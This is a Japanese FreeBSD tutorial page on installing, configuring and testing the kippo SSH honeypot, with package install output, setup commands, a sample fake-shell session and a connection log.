kippo

提供: FreeBSD入門
移動: 案内検索
スポンサーリンク

kippo とは、対話型 ssh のハニーポッドです。

読み方

kippo
きっぽ

概要

kippo は、ssh のハニーポッドです。pkgで入れたkippoの動作が怪しいので、githubからダウンロードしたほうが良さそうです。pkgでインストールすると依存関係がまとめてインストールされるので、pkgで入れた上で、gitコマンドで最新のソースを取ってくるのが良いでしょう。

dl のディレクトリには、wgetコマンドでダウンロードしたファイルが置かれます。kippoを利用して、マルウェアなどの収集が可能です。

インストール

$ sudo pkg install kippo

インストールの例

$ sudo pkg install kippo
Updating FreeBSD repository catalogue...
Fetching meta.txz: 100%    944 B   0.9kB/s    00:01
Fetching packagesite.txz: 100%    5 MiB 330.3kB/s    00:16
Processing entries: 100%
FreeBSD repository update completed. 23798 packages processed.
The following 8 package(s) will be affected (of 0 checked):
 
New packages to be INSTALLED:
        kippo: 0.8
        py27-twistedWeb: 15.2.1
        py27-twistedCore: 15.2.1
        py27-service_identity: 14.0.0
        py27-characteristic: 14.1.0
        py27-asn1-modules: 0.0.6
        py27-zope.interface: 4.1.2
        py27-twistedConch: 15.2.1
 
The process will require 34 MiB more space.
4 MiB to be downloaded.
 
Proceed with this action? [y/N]: y
Fetching kippo-0.8.txz: 100%  383 KiB 196.1kB/s    00:02
Fetching py27-twistedWeb-15.2.1.txz: 100%  457 KiB 234.1kB/s    00:02
Fetching py27-twistedCore-15.2.1.txz: 100%    2 MiB 247.8kB/s    00:09
Fetching py27-service_identity-14.0.0.txz: 100%   12 KiB  12.3kB/s    00:01
Fetching py27-characteristic-14.1.0.txz: 100%   19 KiB  19.8kB/s    00:01
Fetching py27-asn1-modules-0.0.6.txz: 100%   49 KiB  50.5kB/s    00:01
Fetching py27-zope.interface-4.1.2.txz: 100%  171 KiB 175.0kB/s    00:01
Fetching py27-twistedConch-15.2.1.txz: 100%  453 KiB 154.6kB/s    00:03
Checking integrity... done (0 conflicting)
[1/8] Installing py27-characteristic-14.1.0...
[1/8] Extracting py27-characteristic-14.1.0: 100%
[2/8] Installing py27-asn1-modules-0.0.6...
[2/8] Extracting py27-asn1-modules-0.0.6: 100%
[3/8] Installing py27-service_identity-14.0.0...
[3/8] Extracting py27-service_identity-14.0.0: 100%
[4/8] Installing py27-zope.interface-4.1.2...
[4/8] Extracting py27-zope.interface-4.1.2: 100%
[5/8] Installing py27-twistedCore-15.2.1...
[5/8] Extracting py27-twistedCore-15.2.1: 100%
[6/8] Installing py27-twistedWeb-15.2.1...
[6/8] Extracting py27-twistedWeb-15.2.1: 100%
[7/8] Installing py27-twistedConch-15.2.1...
[7/8] Extracting py27-twistedConch-15.2.1: 100%
[8/8] Installing kippo-0.8...
===> Creating users and/or groups.
Creating group 'kippo' with gid '969'.
Creating user 'kippo' with uid '969'.
[8/8] Extracting kippo-0.8: 100%
Message for kippo-0.8:
=UNIQa3607b35465a78cb-h-3--QINU==
kippo has been installed in the following directory:
 
        /usr/local/share/kippo
 
Before starting kippo you need to perform the following steps:
 
1) Edit kippo's configuration file to suit your needs:
 
        $EDITOR /usr/local/share/kippo/kippo.cfg
 
   Please keep in mind when editing the configuration file that kippo
   can't be run as root and is started by the 'kippo' unprivileged
   user instead. This implies that the following folders hierarchy
   must be created and made writable to the 'kippo' user:
 
        dl/
        data/
        log/tty/
 
2) Add the following line to your rc.conf:
 
        kippo_enable="YES"
 
   Note that you can also set the 'kippo_logfile' and 'kippo_pidfile'
   variables to specify the path to the log file and pid file that
   will be used by kippo. The default values for those variables are
   '/tmp/kippo.log' and '/tmp/kippo.pid' respectively.
 
Then you can start kippo by issuing the following command:
 
        service kippo start
=UNIQa3607b35465a78cb-h-4--QINU==

設定

sudo /usr/bin/ssh-keygen -t rsa -f /usr/local/share/kippo/private.key -N ''
sudo mv /usr/local/share/kippo/private.key.pub /usr/local/share/kippo/public.key
sudo chown kippo:kippo /usr/local/share/kippo/*.key
cd /usr/local/share/kippo
sudo mkdir dl data log
sudo chown kippo:kippo dl data log
sudo -u mkdir kippo log/tty

起動

起動は、以下の通りです。

sudo service kippo start

停止は、以下の通りです。

sudo service kippo stop

ディレクトリの意味

dl
wgetを利用して、ダウンロードされたファイルが保存されます。
log/kippo.log
kippoのログファイルです。
log/tty/
セッションのログです。
honeyfs
偽のファイルシステムのためのファイル群です。

デフォルトのポート

デフォルトのポートは、2222 です。

使い方

ログインしてみる

$ ssh -l root localhost -p 2222
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is SHA256:ZZZZZZZZZZZZZZZZZZZZ.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
Password:
nas3:~#
nas3:~# ps -a
 PID TTY      STAT    TIME COMMAND
   1 ?        Ss      0:07 init [2]
   2 ?        S<      0:00 [kthreadd]
   3 ?        S<      0:00 [migration/0]
   4 ?        S<      0:00 [ksoftirqd/0]
   5 ?        S<      0:00 [watchdog/0]
   6 ?        S<      0:17 [events/0]
   7 ?        S<      0:00 [khelper]
  39 ?        S<      0:00 [kblockd/0]
  41 ?        S<      0:00 [kacpid]
  42 ?        S<      0:00 [kacpi_notify]
 170 ?        S<      0:00 [kseriod]
 207 ?        S       0:01 [pdflush]
 208 ?        S       0:00 [pdflush]
 209 ?        S<      0:00 [kswapd0]
 210 ?        S<      0:00 [aio/0]
 748 ?        S<      0:00 [ata/0]
 749 ?        S<      0:00 [ata_aux]
 929 ?        S<      0:00 [scsi_eh_0]
1014 ?        D<      0:03 [kjournald]
1087 ?        S<s     0:00 udevd --daemon
1553 ?        S<      0:00 [kpsmoused]
2054 ?        Sl      0:01 /usr/sbin/rsyslogd -c3
2103 tty1     Ss      0:00 /bin/login --
2105 tty2     Ss+     0:00 /sbin/getty 38400 tty2
2107 tty3     Ss+     0:00 /sbin/getty 38400 tty3
2109 tty4     Ss+     0:00 /sbin/getty 38400 tty4
2110 tty5     Ss+     0:00 /sbin/getty 38400 tty5
2112 tty6     Ss+     0:00 /sbin/getty 38400 tty6
2133 ?        S<s     0:00 dhclient3 -pf /var/run/dhclient.eth0.pid -lf /var/lib
4969 ?        Ss      0:00 /usr/sbin/sshd: root@pts/0
5673 pts/0    Ss      0:00 -bash
5679 pts/0    R+      0:00 ps -a
nas3:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)
 
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)

ログ

$ tail -f /tmp/kippo.log
2015-07-09 02:14:08+0900 [-] New connection: 127.0.0.1:41836 (127.0.0.1:2222) [session: 0]
2015-07-09 02:14:08+0900 [-] Remote SSH version: SSH-2.0-OpenSSH_6.8-hpn14v5
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] kex alg, key alg:
				diffie-hellman-group1-sha1 ssh-rsa
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] outgoing: aes128-ctr hmac-sha1 none
2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] incoming: aes128-ctr hmac-sha1 none
2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] NEW KEYS
2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] starting service ssh-userauth
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1]
				root trying auth none
2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1]
				root trying auth keyboard-interactive
2015-07-09 02:14:15+0900 [-] login attempt [root/123456] succeeded
2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1]
				root authenticated with keyboard-interactive
2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1]
				starting service ssh-connection
2015-07-09 02:14:15+0900 [SSHService ssh-connection on
				HoneyPotTransport,0,127.0.0.1] got channel session request
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection
				on HoneyPotTransport,0,127.0.0.1] channel open
2015-07-09 02:14:15+0900 [SSHService ssh-connection on
				HoneyPotTransport,0,127.0.0.1] got global
				no-more-sessions@openssh.com request
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection
				on HoneyPotTransport,0,127.0.0.1] pty request:
				xterm-256color (71, 80, 0, 0)
2015-07-09 02:14:15+0900 [-] Terminal size: 71 80
2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection
				on HoneyPotTransport,0,127.0.0.1] getting shell
2015-07-09 02:14:15+0900 [-] Opening TTY log: log/tty/20150709-021415-8938.log
2015-07-09 02:14:17+0900 [-] /etc/motd resolved into /etc/motd
2015-07-09 02:15:34+0900 [-] CMD: ls
2015-07-09 02:15:34+0900 [-] Command found: ls
2015-07-09 02:15:38+0900 [-] CMD: ls /bin
2015-07-09 02:15:38+0900 [-] Command found: ls /bin
2015-07-09 02:15:47+0900 [-] CMD: ps
2015-07-09 02:15:47+0900 [-] Command found: ps
2015-07-09 02:15:50+0900 [-] CMD: ps -a
2015-07-09 02:15:50+0900 [-] Command found: ps -a
2015-07-09 02:15:59+0900 [-] CMD: ifconfig
2015-07-09 02:15:59+0900 [-] Command found: ifconfig
2015-07-09 02:15:59+0900 [-] Reading txtcmd from
				"/usr/local/share/kippo/txtcmds/sbin/ifconfig"

関連項目




スポンサーリンク